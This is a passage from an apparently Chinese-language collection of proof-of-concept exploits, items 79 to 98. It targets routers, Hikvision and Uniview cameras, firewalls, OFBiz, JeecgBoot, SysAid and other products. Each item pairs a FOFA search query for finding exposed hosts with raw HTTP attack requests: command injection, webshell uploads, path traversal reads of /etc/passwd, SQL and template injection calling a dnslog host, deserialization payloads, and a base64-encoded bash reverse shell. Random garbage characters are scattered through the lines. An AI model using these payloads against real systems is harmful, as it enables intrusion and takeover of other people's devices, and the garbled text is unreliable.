YsOxWxSvj1KyZow1PTsh98fdu6l+ _; p8 H4 m0 P, \
------YsOxWxSvj1KyZow1PTsh98fdu6l
1 p9 v4 _7 A/ Q0 u" u' H2 B6 ~. O$ o+ kContent-Disposition: form-data; name="target"
4 F/ m8 |. C$ h$ R. }. p1 u5 i* k3 [5 j* b
/Applications/SkillDevelopAndEHS/
/ L" t- C6 U: I4 J6 f3 a9 P------YsOxWxSvj1KyZow1PTsh98fdu6l--; ]/ R) B( }9 w
, v& R/ c) J8 X0 {( Q7 U
3 ?: |' j0 c( O3 ~# l
GET /Applications/SkillDevelopAndEHS/YsOxWxSvj1KyZow1PTsh98fdu6l.txt HTTP/1.1
e0 }* n- a, k J" h( `8 d% b; n4 hHost: x.x.x.x, Q$ u7 v1 w1 S( b& C: A' I8 T" ]7 P
( j4 q* R; K9 A$ b6 }: F/ i5 P' f( d+ v5 T# T
79. BYTEVALUE 百为流控路由器远程命令执行. m, T" B7 ?6 s( Z$ \$ ~5 r
FOFA:BYTEVALUE 智能流控路由器
5 l. x; v0 A& P7 ?$ lGET /goform/webRead/open/?path=|id HTTP/1.1# `/ ^& L4 I' E7 y5 {
Host:IP
" k# u% j+ }8 ~# X1 zUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
j9 B/ z) q6 m. J' tAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
2 I A- w( w. M. uAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2# | J; o5 q% w. Z
Accept-Encoding: gzip, deflate7 E' |& \" g4 _3 M3 O7 u
Connection: close3 r! c$ u3 R$ S, w+ o
Upgrade-Insecure-Requests: 1; E+ t3 L. x4 _& V' [
3 y' L- o: a1 v8 q3 v7 ]9 {% I4 ~- P; n8 w( O
80. 速达天耀软件DesignReportSave.jsp接口存在任意文件上传9 x: e$ {3 w0 }5 o0 U O9 M/ F
FOFA:app="速达软件-公司产品"
& z+ M# ~1 N7 O7 D* d9 VPOST /report/DesignReportSave.jsp?report=../xykqmfxpoas.jsp HTTP/1.1, Z( ]3 O6 w- ]# E- N
Host: x.x.x.x( A8 K1 y" X1 ?6 T( Z
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
5 W! o3 L; U, }5 v/ e; s! dContent-Length: 27
, O# u) i1 A j; B" H6 G! ]Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
: [! x# |7 l% ]% XAccept-Encoding: gzip, deflate
& M" c9 a& |. c& V: n+ d+ \* N6 ]Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
2 D1 E2 E# S. c) {* E+ c' GConnection: close- Z4 t0 U" H/ X Y
Content-Type: application/octet-stream- u* M( Q0 L4 z, U- N& e( ]$ z" F
Upgrade-Insecure-Requests: 1' `( w7 i8 Q9 I/ T8 L! m! _
% \% [' H+ X+ P<% out.print("oessqeonylzaf");%>0 v* u8 ?( a/ |3 A
7 d+ I5 f$ o. j9 E+ [
& ^4 P1 c/ G/ |$ m! k! xGET /xykqmfxpoas.jsp HTTP/1.1$ `* t! {$ ?# G# g* s. c
Host: x.x.x.x0 f0 w$ y5 e- y: {$ X
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
7 \$ y5 L( v' m. Y/ DConnection: close
2 z$ t* ]" w/ \6 oAccept-Encoding: gzip+ n9 V3 w0 e# z% p" N, z
$ {0 K! x5 U( t% A- v. z
& P8 j) l& M$ B7 i6 g6 _81. 宇视科技视频监控宇视(Uniview)main-cgi密码泄露3 a( i, n7 I# F b* [4 R) h. y0 u
FOFA:app="uniview-视频监控"
8 |9 z# }! }& R% RGET /cgi-bin/main-cgi?json={"cmd":255,"szUserName":"","u32UserLoginHandle":-1} HTTP/1.10 l$ \* L7 _6 h* Z+ i0 O
Host: x.x.x.x7 S: c# a( ~3 M2 Z; l
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15& q; `# a4 K" f) {9 ]1 \
Connection: close7 z, ^% o6 [" T _2 \6 F
Accept-Encoding: gzip
5 k& Z4 [; k4 w4 K" z9 k$ U: S+ n( T: A% Q) ?# i* e; H+ w
W3 p* K: a2 }82. 思福迪LOGBASE运维安全管理系统 test_qrcode_b 远程命令执行; I C% y; ?. D; t5 M* A: s' p/ z# w0 x
FOFA:app="思福迪-LOGBASE"
& Y& {: M2 V9 v bPOST /bhost/test_qrcode_b HTTP/1.18 g' V6 s9 X: |7 w5 Y. R
Host: BaseURL3 K: ]8 ~' }3 u/ o$ |9 g
User-Agent: Go-http-client/1.1
' v1 f! p# E7 ~Content-Length: 23" u& I& S; B- j9 v7 m8 q5 G
Accept-Encoding: gzip/ N4 p6 V) M7 Y
Connection: close
6 a+ H9 P. |6 ^7 FContent-Type: application/x-www-form-urlencoded- |' Q% Y- c% Z
Referer: BaseURL- s- c& D7 |% Y
' V: U) P( H& q, h; c: A; kz1=1&z2="|id;"&z3=bhost
8 k c4 T" K$ i# F; v6 N) x: v5 u1 _8 `, X( W# L9 i
" B. W* z% H5 t' G/ u) s! k) S83. JeecgBoot testConnection 远程命令执行
8 m" z* _! `/ k/ VFOFA:title=="JeecgBoot 企业级低代码平台"
2 o! D- E9 e& \1 p* e4 \2 m( Q$ O1 j0 V! _: g( r- }% T
- Q, g3 t$ z/ p' u
POST /jmreport/testConnection HTTP/1.1
$ k( y8 j& j6 A( P/ h5 p4 C" gHost: x.x.x.x
1 R8 N) k2 `9 u; q! |( n+ CUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
' p% Z7 d: n( E, G: nConnection: close F5 ]2 ~$ x7 C% E- W
Content-Length: 88819 m3 H: r! R& Q+ T7 h/ Y8 z H3 h& e
Accept-Encoding: gzip# A; U3 q' V" d/ D$ G6 L L
Cmd: echo "2ZTvHsq4au3uOQ2mK9OuJb86rdO"6 |; A- U& e- A) E( V
Content-Type: application/json
( p$ Y4 h. ?% Z
0 a. g5 Y* x0 _# T9 e, l+ IPAYLOAD$ [: o8 ?- X' s- i: ?& T4 q
$ o$ _8 s4 c1 u) c5 H
84. Jeecg-Boot JimuReport queryFieldBySql 模板注入) e" T1 C* {3 F% E
FOFA:title=="JeecgBoot 企业级低代码平台"
! _: O. [0 ^! u1 ?- ~. ^* K' j9 x
( a1 _0 ]8 }) `/ D7 H/ M+ N
% ?6 o! g: E2 s8 f& K' a( q' a) g+ B9 D$ c8 N. M2 N5 e& a
POST /jeecg-boot/jmreport/queryFieldBySql HTTP/1.1. D4 t, B) J/ ^, o$ s) v1 R
Host: 192.168.40.130:80809 I1 L( j+ C% n" [
User-Agent: curl/7.88.1* P- L2 ?5 o/ ? [- x, a T0 L
Content-Length: 1567 _( {4 I. l; N6 f& z+ j" ?
Accept: */*: f, |5 Z- k8 `
Connection: close
9 d: u& c/ t4 v# AContent-Type: application/json
/ r2 N7 P6 O1 {4 P" p( Z1 mAccept-Encoding: gzip$ Z5 K$ G5 F1 v0 t
9 B) N9 u- o( L& w3 Z$ U8 [{
& n4 W$ R9 P8 w! E "sql": "<#assign ex=\"freemarker.template.utility.Execute\"?new()>${ex(\"curl http://ip.port.kr9dqoau.dnslog.pw/`whoami\")}",
6 b7 G% n% k2 G% P "type": "0"4 v5 P! X+ r6 M3 F$ }6 ~
}
! |1 F [; n- O6 T* E+ o
; y+ V9 p; K% u5 L9 h2 w3 w% s. J2 W, {3 ]
85. SysAid On-premise< 23.3.36远程代码执行9 A4 m" z% L4 t. s. p# N' K. K2 w
CVE-2023-47246
2 a1 R; Y8 {* J" ^FOFA:body="sysaid-logo-dark-green.png"
% G( p# P: y1 g5 i" L- o: ^$ b" TEXP数据包如下,注入哥斯拉马
3 J( J5 q& L# u& mPOST /userentry?accountId=../../../tomcat/webapps&symbolName=LDAP_REFRESH_ HTTP/1.1
: Q! J2 U! t! p) _) ?7 zHost: x.x.x.x$ W; s9 q$ } J4 z' I
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15: B6 }: A7 X! s: W2 I g% Q
Content-Type: application/octet-stream
* K8 L2 q# Z$ W* TAccept-Encoding: gzip3 y: s c% y- e' g
0 B$ c1 Z' U9 \* B8 ]$ _PAYLOAD5 d# x8 V0 ~$ t; c+ w+ ?' y7 S9 l
, V3 V# I1 U* M% l$ r% i
回显URL:http://x.x.x.x/userfiles/index.jsp. ~& S2 z# }% k9 g
8 K. [% l$ `. |86. 日本tosei自助洗衣机RCE" f3 x, l7 H& }! q" Y5 n
FOFA:body="tosei_login_check.php"
1 |- Y& f) u" ~5 nPOST /cgi-bin/network_test.php HTTP/1.1
1 _, m ?5 b; x6 v- V. tHost: x.x.x.x
" n n) b7 i6 Z5 Q1 ~User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.365 ?* u3 t0 L7 L) _- s! M7 m8 t! s
Connection: close! d. M. \# q5 Z8 C$ F
Content-Length: 44
4 u6 J; z5 [4 o f3 Q' SAccept: */*. \- v+ b* X' }* k4 {3 n
Accept-Encoding: gzip1 n! f9 y6 C& U( h, n
Accept-Language: en
: j& j, M8 h/ K1 f7 W- x: WContent-Type: application/x-www-form-urlencoded
1 ~4 B0 _' o, j. I `5 v) k
$ D4 ]: ]9 Y: Qhost=%0acat${IFS}/etc/passwd%0a&command=ping# C0 E) H5 M) H! p
- N+ t: L4 D. M% y: S# t+ N
[1 f4 J% |6 q6 w% N3 v) Z87. 安恒明御安全网关aaa_local_web_preview文件上传& I) ^9 B+ O) e: Y+ w! G
FOFA:title="明御安全网关") @( @7 t2 s6 m E4 J! N
POST /webui/?g=aaa_local_web_preview&name=123&read=0&suffix=/../../../jfhatuwe.php HTTP/1.1
8 j( U) B# F4 \& f8 tHost: X.X.X.X6 M- p9 [* d" z2 I% K! j+ _
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.159 h* v8 i1 S0 p. z F
Connection: close
* p6 N( _' o% G1 E- j$ XContent-Length: 198
$ O. g3 a2 c5 h5 Z8 SAccept-Encoding: gzip
# D5 j; H% y, g5 O5 aContent-Type: multipart/form-data; boundary=qqobiandqgawlxodfiisporjwravxtvd
+ j$ h. r& i/ g+ @" r$ X6 Y. n2 V1 w/ Y8 u9 K
--qqobiandqgawlxodfiisporjwravxtvd
0 i7 p x1 X! YContent-Disposition: form-data; name="123"; filename="9B9Ccd.php"
- b1 P+ N+ |) |$ r D% O' R( b5 MContent-Type: text/plain$ i* c+ u* T0 a( Z3 I* T8 Q6 u0 X
5 B, w# F6 l+ W: d+ F, X
2ZqGNnsjzzU2GBBPyd8AIA7QlDq
, E; f: Q; q/ P/ T--qqobiandqgawlxodfiisporjwravxtvd--+ E- Z, c; M2 h$ E) T
! g3 a$ U6 k* W. h
& P% a0 C- H+ F/jfhatuwe.php& E; t' }3 t; q, V; P
4 C5 _6 P/ L# Z2 M- X3 s
88. 安恒明御安全网关 aaa_portal_auth_config_reset 远程命令执行* { E r( E! {& Q# J: d; I
FOFA:title="明御安全网关"
! N: b5 S4 \' F. D/ b6 lGET /webui/?g=aaa_portal_auth_config_reset&type=%0aecho%20%27%3C%3Fphp%20echo%20%22assdwdmpidmsbzoabahpjhnokiduw%22%3B%20phpinfo%28%29%3B%20%3F%3E%27%20%3E%3E%20%2Fusr%2Flocal%2Fwebui%2Ftxzfsrur.php%0a HTTP/1.1' h9 N( Z& X& G B+ U$ B
Host: x.x.x.xx.x.x.x
( E8 {! ]) M" w$ W& f4 H: A( sUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
# \- S0 s3 p! a8 o% i" bAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
7 O! @: F! h8 f$ m. sAccept-Encoding: gzip, deflate
! k0 o* _5 }5 S' w. ]) FAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2- E p: G5 g1 ]' d @3 P9 w& }
Connection: close
% _. J1 w6 X8 a' \! w
- e; J @4 F8 D3 s/ H$ r2 |( z: M# F; R6 f
/astdfkhl.php2 e' k0 i: @# e- q9 `) h
. {7 v& [+ f0 V# h" n) F7 M
89. 致远互联FE协作办公平台editflow_manager存在sql注入1 Q% K1 K& D0 O! t: D' V
FOFA:title="FE协作办公平台" || body="li_plugins_download"
2 g) R' Q& W) y# D. V, r; D" n- OPOST /sysform/003/editflow_manager.js%70 HTTP/1.13 I' S+ w8 T; |8 L6 k5 @
Host: x.x.x.x
* m5 n- E% R& X7 J, TUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.152 ]% ~4 X0 I( s7 X
Connection: close" V. O$ O( Z6 W' l* F
Content-Length: 41- c" M! X1 ]. ]; a1 d, W9 F7 b
Content-Type: application/x-www-form-urlencoded
% c' {9 b, U& `1 U( N% N) aAccept-Encoding: gzip. ?6 a# ?+ s7 K4 K& M
8 ^$ [* x; e) A* M; [option=2&GUID=-1'+union+select+111*222--+
+ k) @% q7 s; n8 A |, K! O& L: B! b
) w# P0 D, s! F+ _1 N( L: h% J/ U. ]) t$ F# l; Q; R1 o8 X) V0 F
90. 海康威视IP网络对讲广播系统3.0.3_20201113_RELEASE远程命令执行
: E8 p( D5 G) }5 W d: vFOFA:icon_hash="-1830859634"
1 O8 W/ O/ G7 |POST /php/ping.php HTTP/1.1
, y6 v! x! P; l% ?' q% SHost: x.x.x.x
$ L3 O" `( v7 h, i% e/ xUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
9 p0 d) B' B6 oContent-Length: 510 n4 q5 j6 j( X' a8 B
Accept: application/json, text/javascript, */*; q=0.01
7 k4 A- u8 {' U8 i1 XAccept-Encoding: gzip, deflate
4 h$ i5 v3 G i+ G+ {- P1 KAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.23 @4 `* R n) x/ w5 O( \
Connection: close J1 O% B( I! B, P; I
Content-Type: application/x-www-form-urlencoded
) k, n1 E+ L) ~& H: d0 L, `X-Requested-With: XMLHttpRequest
2 I* J: ]# a S: l9 u
; V& a S3 { w4 ojsondata%5Btype%5D=99&jsondata%5Bip%5D=ipconfig
( w4 l5 J0 |, ?$ q6 m8 z" V3 ^
3 ?2 L% t5 S6 P- I* s7 Z( \+ ?
0 Q3 B( h( I! j3 M8 ^91. 海康威视综合安防管理平台orgManage/v1/orgs/download任意文件读取
" @# s8 y" ~4 S& r3 O5 L6 kFOFA:title="综合安防管理平台", U+ Y; O% |& h; N) B
GET /center/api/task/..;/orgManage/v1/orgs/download?fileName=../../../../../../../etc/passwd HTTP/1.1
3 L* @" r9 U% D- \/ d" E+ UHost: your-ip
3 P6 f/ k1 |! f8 ^% d! {User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36* D* h0 j, s! k- [9 h& _$ g8 V: `4 c f
Accept-Encoding: gzip, deflate
?8 p. h9 {6 U5 i0 xAccept: */*6 }4 M. ^, X7 z6 Z& y4 K
Connection: keep-alive
4 Q, m8 T1 a; z! [1 v0 w. l) c8 e, f2 c
7 n: v( l9 L5 K" D3 G, K
9 ?( U8 c7 T4 t1 I4 O( k7 W7 }9 Y1 l92. 海康威视运行管理中心session命令执行
8 i5 }1 v; l i# \% vFastjson命令执行
0 K5 x7 i K' R/ G, ]hunter:web.icon=="e05b47d5ce11d2f4182a964255870b76"7 F1 D: q# q& t) {( p* v; h2 C
POST /center/api/session HTTP/1.15 z& R1 J5 _2 t* A: q
Host:
* c5 I5 J1 z5 T" K7 K% [- s& r; P7 b/ BAccept: application/json, text/plain, */*% H- k7 x" G6 Z9 _& U q* U
Accept-Encoding: gzip, deflate
K0 _2 q! ]2 t0 h* SX-Requested-With: XMLHttpRequest. N0 L, Y2 k& a' o% |) J: o, Y& D6 A
Content-Type: application/json;charset=UTF-85 _8 o% \$ {2 v$ z4 n
X-Language-Type: zh_CN
3 W# r+ N- T& ]5 m% ?- H: p: DTestcmd: echo test
^" \. Q+ X$ i( [7 g' ]User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X -1_0_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.368 n& F4 F( m: Z, f, v5 D
Accept-Language: zh-CN,zh;q=0.9
) d1 m" Y4 F A% ?/ k6 {Content-Length: 5778
7 c6 o. M; g$ z& [2 B$ f% V6 {! l8 E5 g1 f3 `' O" K4 Z
PAYLOAD& @# k% p/ r# Q2 w
) E- c( c/ A2 b" l
0 L8 r& i% K! B3 D+ {0 s93. 奇安信网神SecGate3600防火墙app_av_import_save任意文件上传' x" f/ \+ D8 g' ^9 v& b
FOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="! ?! b! R& ~3 e0 j5 Z& n) z
POST /?g=app_av_import_save HTTP/1.1( b; ~7 r7 M% U$ T( ]+ o1 [
Host: x.x.x.x4 D" W: k) }' B; |6 ~5 v G* v
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarykcbkgdfx$ A, t; |' n, W- M8 i% ]5 R( }
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
6 b7 G1 E8 A' y4 v8 R' a Y: J3 ^* i, R# r% n6 r0 o
------WebKitFormBoundarykcbkgdfx" G) ]3 i' l0 Y$ s# U/ K
Content-Disposition: form-data; name="MAX_FILE_SIZE" m3 y9 N3 R+ w- H, u
/ s9 t* x. o1 \: b/ p10000000. k) e8 z2 L" V4 O* k' J
------WebKitFormBoundarykcbkgdfx4 ]' c/ J1 A; _8 P0 K/ j4 y
Content-Disposition: form-data; name="upfile"; filename="xlskxknxa.txt"
/ _( g i/ f F! }2 V- hContent-Type: text/plain
5 {& X( l s) }5 N" p8 }% {! H% c, h6 Y3 j/ F$ _
wagletqrkwrddkthtulxsqrphulnknxa
) T& J ?& `+ j" \' b------WebKitFormBoundarykcbkgdfx4 E! k: O$ x- s. M
Content-Disposition: form-data; name="submit_post"
' B, d4 d% R1 V; m3 Z
3 F* I# b y0 Robj_app_upfile, g; |# R o$ y4 J
------WebKitFormBoundarykcbkgdfx
$ J& \ ?7 ~- F$ nContent-Disposition: form-data; name="__hash__"5 \) y0 \9 `+ t s
l6 t( n! x0 w& D. ?/ b0b9d6b1ab7479ab69d9f71b05e0e9445! Z( D0 u5 [4 u$ W* E. P, p
------WebKitFormBoundarykcbkgdfx--
$ y1 k. y* f: }: k5 B6 }4 }% k. Z
+ b9 o; g0 X7 Z. t( P0 v7 \) ]) n5 J% }( m7 B- b' }
GET /attachements/xlskxknxa.txt HTTP/1.1
% D7 r3 U) @4 Q- G7 \" R8 PHost: xx.xx.xx.xx
8 _% H# G) p, Z. n% z2 v3 f/ _User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.365 ~- j: g& j! B( K( I
- G: h1 q! d+ I' n
* q/ Z- k1 S1 q: v+ Y& v94. 奇安信网神SecGate3600防火墙obj_area_import_save任意文件上传$ B& O9 Z* \4 M7 [
FOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="
5 q9 X& [& I4 H4 yPOST /?g=obj_area_import_save HTTP/1.1
( M4 W1 g4 ]/ j1 CHost: x.x.x.x
3 ?1 S% [5 D' C# y3 m& u) V- P2 Y" QContent-Type: multipart/form-data; boundary=----WebKitFormBoundarybqvzqvmt j( {/ i# k. r5 Y" t
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
6 A- a, N) Z) x
" V" K! ?! \5 i, L------WebKitFormBoundarybqvzqvmt
" S6 D4 i0 z6 d: H) F: VContent-Disposition: form-data; name="MAX_FILE_SIZE" \. H1 S. {1 w8 \
: n0 i: B$ v& P) ?6 X
10000000% H$ `9 K: |+ }$ ^
------WebKitFormBoundarybqvzqvmt# z) y5 U5 S0 Z& T0 n* u8 X
Content-Disposition: form-data; name="upfile"; filename="cciytdzu.txt"0 q+ @/ M& \, i. G4 C% U
Content-Type: text/plain
% r: V7 s0 C( `# h; Y# \5 j6 ]- i* j5 [' M
pxplitttsrjnyoafavcajwkvhxindhmu1 C6 T7 Z" k% }& X5 r+ C( M
------WebKitFormBoundarybqvzqvmt
/ h7 M1 S( _" \9 f @/ H8 P) IContent-Disposition: form-data; name="submit_post"% V! I; G4 |$ m6 @) Z7 J# R
$ O% [) [9 i+ U, N) y$ K
obj_app_upfile
. o5 \. N+ \( T2 r' x% Y------WebKitFormBoundarybqvzqvmt. w4 B0 n; k+ w
Content-Disposition: form-data; name="__hash__"
- o( }# Z3 [3 d2 f
* z" K' f; Q+ J: s: z0b9d6b1ab7479ab69d9f71b05e0e94459 @0 |6 v) _7 u
------WebKitFormBoundarybqvzqvmt--: L: f6 ?7 u5 \. p" \
0 e; V( i) e; m1 t; J
; k' C( p4 h" A8 i
7 O0 P) Z7 a/ ^
GET /attachements/xlskxknxa.txt HTTP/1.1
4 l8 ~. x1 ~2 O% v( a# |" `Host: xx.xx.xx.xx) F- I9 P# {8 D: Y" g
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
6 d+ _$ B Z/ S; B; `
; k0 q) f G, c! H
# i- ~2 u# a! }9 `6 a- a) v+ Z- Z- h0 [. _0 R8 Q
95. Apache-OFBiz < 18.12.10 xmlrpc远程代码执行 B2 _0 P$ a9 A3 w5 g# R& n% T/ j
CVE-2023-490704 p9 ?; c$ l. i9 r7 q3 N
FOFA:app="Apache_OFBiz"6 Z( T6 J, R& B# S) c3 T1 y
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
' } G: u* {; THost: x.x.x.x
# C3 }% M+ j' w @) VUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.368 o2 B0 L3 `! G) n6 z
Connection: close
2 b* V6 l3 L$ W( t. |* eContent-Length: 889& N% B& V4 j4 X- D
Content-Type: application/xml
, e, a8 b: L. f# q: MAccept-Encoding: gzip5 b$ C L1 p! p- U* F: W
0 F/ W D5 m# x, n. q$ K; U
<?xml version="1.0"?>
$ p* |& { t+ k \" N2 P<methodCall>& [7 @# |, s3 J7 T
<methodName>2a4UTp2XBzXgziEO3BIFOCbJiI3</methodName>
) I, v$ p) Z: ]4 N) G <params>
" w& z' ~7 K8 p& ~& S9 ] <param>$ k {; X2 x$ w" L7 A' y
<value>0 F5 S- G d$ D7 G1 u, o
<struct>
% J/ z1 q1 r/ U% ^6 m$ ^% X# A <member> S [, V& [; D- o8 d* j
<name>test</name>; o% z% O) b6 P* i
<value>& M( }, d! G: i, `8 p
<serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">[payload的base64值]</serializable>) q: R: U6 i3 K; n& v+ l
</value>- V7 s! E. k) O& V; S
</member>, y9 x7 ]4 B& Z" i/ l! q1 L6 m
</struct>
( l0 h- O/ H1 `& V1 Z7 U </value>: R! f3 ^1 f' r4 I4 O9 A. R
</param>1 I5 I6 M0 Y; ^2 v% [5 k4 ?
</params>" d$ Z# Z1 T2 L8 L8 L5 B% J6 G( l
</methodCall> e1 G {8 m y/ C
1 @& t1 l# P" }$ P" Y3 y
" ^1 | V/ l* b用ysoserial生成payload
! b2 }+ b) f7 i* a# ?9 a5 ajava -jar ysoserial-all.jar CommonsBeanutils1 "ping 41e87zy3.dnslog.pw" | base64 | tr -d "\n"
" G' a0 t" M# Q6 t3 X0 j0 P% s, v' P) s% X4 B
0 ]6 w. o6 R7 J" X将生成的payload替换到上面的POC
6 t% N4 t* w& Y& W( @# qPOST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.13 u* J+ D) Z3 t5 g: a) o- X
Host: 192.168.40.130:8443
$ T+ J: ~( E; T+ \3 ?- lUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
& c8 B5 A Q# o7 `Connection: close
5 t6 G$ A3 B4 @" N, W AContent-Length: 889
& b1 _( C- f: tContent-Type: application/xml
0 n/ i* |' B: o, zAccept-Encoding: gzip
5 F- B. e/ F: P& U% G; |9 `; |8 w% N) T
PAYLOAD, Y: E4 r/ s" R# x
, Q+ E: O- ^0 [6 z3 A7 k# P: c96. Apache OFBiz 18.12.11 groovy 远程代码执行
: i% e3 o8 U& s. t2 y+ X) z/ {FOFA:app="Apache_OFBiz". m7 ?* Q5 ?2 v" [1 k- }6 @
POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
( @% R* U8 C- E5 ^9 |Host: localhost:8443
+ _$ d; f/ B6 X3 \User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
# r' C8 Z0 ]! C/ O0 z8 [Accept: */*1 f$ Q0 F8 ]+ T8 `" P& |
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
7 M1 ~! K2 Q& H8 \) \& rContent-Type: application/x-www-form-urlencoded
5 U9 g9 j+ H+ c9 JContent-Length: 55
. r, T4 H; w e6 g8 G9 L5 j. M* E
' j' q2 |2 K: H$ \. JgroovyProgram=throw+new+Exception('id'.execute().text);
" m. o* c3 {+ P" a8 b( s! W" z9 T, K7 Q8 N3 B- x- X+ W" ~- ?
9 d* Q2 n8 y, p7 e& F4 P3 D% {1 n反弹shell
& h8 f% e8 q! J; a5 p+ \( j7 F在kali上启动一个监听! |; ?) [+ h0 `
nc -lvp 7777+ `! P# _4 n- m: I9 l
9 N, r8 p- i4 I' ~. BPOST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.10 {2 r' z# s `# l& A
Host: 192.168.40.130:8443, P* T I. M. i6 u
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0/ Q# K, T! W7 W7 Y0 X. D+ R
Accept: */*
+ j+ _7 E0 r6 G; O, S7 rAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 b2 s d" o% M. i0 b8 M& P
Content-Type: application/x-www-form-urlencoded' V5 ^' t1 R( l* F* w: w; a) ]
Content-Length: 710 n2 x7 s* D3 x+ [
3 J7 u4 E( M; m+ i$ R: wgroovyProgram='bash+-c+{echo,YmFzaCUyMC1pJTIwPiYlMjAvZGV2L3RjcC8xOTIuMTY4LjQwLjEyOC83Nzc3JTIwMD4mMQ==}|{base64,-d}|{bash,-i}'.execute();4 [ k1 Y; A3 G: U( \
8 g9 p8 E4 {/ R6 i7 C, l/ D- I
97. OneBlog v2.2.2 博客Shiro反序列化远程命令执行: s7 g6 c G. r4 q
FOFA:body="/assets/js/zhyd.tool.js" || body="OneBlog,开源博客"
' K4 K+ I7 R f+ aGET /passport/login/ HTTP/1.1' t3 j" q1 J9 F' _; A* m
Host: 192.168.40.130:8085! d8 s+ r# q. R" T
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
% ^. C! A6 {7 ~& |Accept-Encoding: gzip( r5 R& G7 D5 Q3 X& {& r
Connection: close8 T" k# [% q5 G
Cookie: rememberMe=PAYLOAD. _7 b [$ C! g: j$ f
X-Token-Data: echo "2a4MU6FVYI3qR4AWxn1Bdfh6Ttk"
4 _5 M/ r: T1 ~; v f/ A" M, x- U
s% I2 ?+ G" i4 m2 r: M Q: k) R! ^; ?4 \. }
98. SpiderFlow爬虫平台远程命令执行
) @! M5 E* F4 uCVE-2024-0195; }! s; u% d1 A
FOFA:app="SpiderFlow"3 s7 k! _" Y6 D0 g" B' |$ B
POST /function/save HTTP/1.1
+ P( l3 L" k i: i/ A* XHost: 192.168.40.130:8088
/ q' w4 c/ X l( x7 B9 m. WUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0" G: ]/ C" b% I5 |
Connection: close O1 O. O6 Z. i) x* a
Content-Length: 121! \$ A8 H1 _! \! R( q/ e
Accept: */*
